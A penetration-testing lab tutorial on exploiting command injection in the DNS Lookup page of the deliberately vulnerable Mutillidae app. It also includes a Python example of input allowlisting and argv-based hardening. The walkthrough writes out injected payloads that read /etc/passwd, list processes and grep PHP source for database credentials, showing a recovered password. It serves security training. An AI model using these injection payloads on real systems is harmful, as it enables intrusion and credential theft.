Mutillidae Part 2: Command Injection Database Interrogation



What is Mutillidae?

Mutillidae is a free, open source, deliberately vulnerable web application that provides a target for web-security analysts. It contains the OWASP Top 10 vulnerabilities and was designed by OWASP.
What is command injection?
Command injection is a web vulnerability that allows an attacker to run operating system commands or server-side scripts through the web interface (the web application). This type of vulnerability occurs when a web application lets users run commands such as nslookup, whois, ping or traceroute from a web page. It can be tested with a fuzzing technique: the attacker appends a shell separator such as ";", "|", "||", "&" or "&&" to the end of the expected input.
For example: [expected_Input]; [command]

Pre-Requisite Web Penetration Testing Lab

1. Configured Mutillidae (see: How To Setup Virtual Lab For Web Penetration Testing).

Remote database access has been turned on.

2. Installed Kali Linux:

Strictly speaking, Kali Linux is not necessary, but if you are a penetration tester you should use a Kali Linux virtual machine (see: How to install Kali Linux).

Configure the network interfaces of both machines, Fedora-Mutillidae and Kali Linux. Start both machines and check the connectivity between them.

Step 1: Access Mutillidae by Kali Linux Machine

On the Kali Linux machine, open IceWeasel:

Applications -> Internet -> IceWeasel Web Browser
In the URL address bar enter http://Victim_Ip_Address/mutillidae (the victim IP can be obtained with the ifconfig command on the Mutillidae machine).
In my case: http://192.168.0.102/mutillidae


Go to DNS Lookup:
OWASP Top 10 -> A2 – Cross Site Scripting (XSS) -> Reflected (First Order) -> DNS Lookup
The DNS Lookup page does exactly that: it runs the nslookup utility from the command line interface.
Hostname / IP: www.cyberpratibha.com/blog
Click on the Lookup DNS button and see your results.

Test DNS Lookup Vulnerability
To find the command execution vulnerability, enter the hostname followed by a command, separated by ";". Appending ";" after what the software expects is the fuzzing technique described above. Enter the following:
www.cyberpratibha.com/blog; uname -a
View your results.

Perform Reconnaissance:

It would be useful to know which directory this particular web application is running from. On Linux you can find the current working directory with pwd. Follow the given instructions:

Enter Hostname / IP: www.cyberpratibha.com/blog; pwd
Click on the Lookup DNS button and view your results.

Interrogate the dns-lookup.php application

The input supplied by the attacker is executed by dns-lookup.php. Let's see if we can find the line of code where PHP makes a system call. Follow these instructions:

hostname; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'

Click on the Lookup DNS button and analyze your results.

The nslookup Linux command is executed by a function called shell_exec().
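The contrast between that shell-string pattern and a hardened lookup, as an added Python example that is not code from Mutillidae or from this post: the function names and the allowlist regex are my own, the vulnerable form mirrors the string concatenation behind shell_exec(), and the hardened form validates the target and passes an argv list so no shell ever parses the input. The separator tokens are the ones listed in the command injection definition above.

```python
import re
import subprocess

# Strict allowlist for what a DNS-lookup form should accept: a hostname
# (labels of letters, digits and hyphens joined by dots) or an IPv4 address.
# Shell metacharacters such as ";", "|", "||", "&" and "&&" cannot pass it.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"
)

# Fuzzing separators named on the page (plus backtick and $( )); used only
# to label a rejected input when logging or alerting on it.
INJECTION_TOKENS = (";", "||", "|", "&&", "&", "`", "$(", "\n")


def is_safe_target(value: str) -> bool:
    """True only when the input is a plain hostname or IPv4 address."""
    return bool(HOSTNAME_RE.match(value) or IPV4_RE.match(value))


def injection_tokens_in(value: str) -> list:
    """List the separator tokens present in an input, in INJECTION_TOKENS order."""
    return [t for t in INJECTION_TOKENS if t in value]


def vulnerable_command(target: str) -> str:
    # Same pattern as the page's dns-lookup.php: untrusted input is glued into
    # one shell string, so "host; uname -a" makes the shell run both commands.
    return "nslookup " + target


def hardened_argv(target: str) -> list:
    # Hardened form: enforce the allowlist, then build an argv list. Passing a
    # list to subprocess.run() with shell=False means ";" is just a character
    # in one argument, never a command separator.
    if not is_safe_target(target):
        raise ValueError("rejected lookup target: %r" % target)
    return ["nslookup", target]


def rejects_target(target: str) -> bool:
    """Convenience check for logging: True when the allowlist blocks the input."""
    try:
        hardened_argv(target)
    except ValueError:
        return True
    return False


def run_lookup(target: str) -> str:
    """Run the hardened lookup (needs the nslookup binary installed)."""
    argv = hardened_argv(target)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout
```

Note that the page's own input www.cyberpratibha.com/blog is a URL path rather than a hostname, so the allowlist rejects it even before any command is appended.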


Database reconnaissance:
Enter the following syntax:

  • hostname; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'

Click on the Lookup DNS button and view your results. The result shows that MySQL is the database engine.

Discover Database:

  • Using the ps command you can discover the database engine: search the process list for strings such as postgres, sql, db2 and ora.
    hostname; ps -eaf | egrep -i '(postgres|sql|db2|ora)'

Click on the Lookup DNS button to see whether mysqld is running in the result.

Database Interrogation:

In this step we will figure out whether any PHP scripts under /var/www/html/mutillidae contain a database name and password. Enter the given syntax into the text box and click on the Lookup DNS button:

hostname; find /var/www/html/mutillidae -name "*.php"

This command displays a list of all PHP scripts in the /var/www/html/mutillidae folder. There are more than 900 scripts.

Find the password in php scripts:

We will search all PHP scripts for the string "password" together with "="; the command is as follows:
hostname; find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="

Obtain Password from the Results:

Look at the password string; the actual line is:

$mMySQLDatabasePassword = "toor";

Search for user OR Login in the MySQLHandler.php

As we now know, the database password is inside MySQLHandler.php. The following command is used to obtain the user or login:
hostname; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="

Display MySQLHandler.php
I could have shown you this first, but good things come to those who wait.

It is possible to display the contents of the MySQLHandler.php program by encoding the "<?php" and "?>" tags. These tags tell Apache to execute a PHP script. To get around this and simply show the text of the file, we change "<" to "&#60;" and ">" to "&#62;".

hostname; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'

Click on the Lookup DNS Button, and view the result.

Vijay Kumar

Ethical Hacking & Penetration Testing Trainer
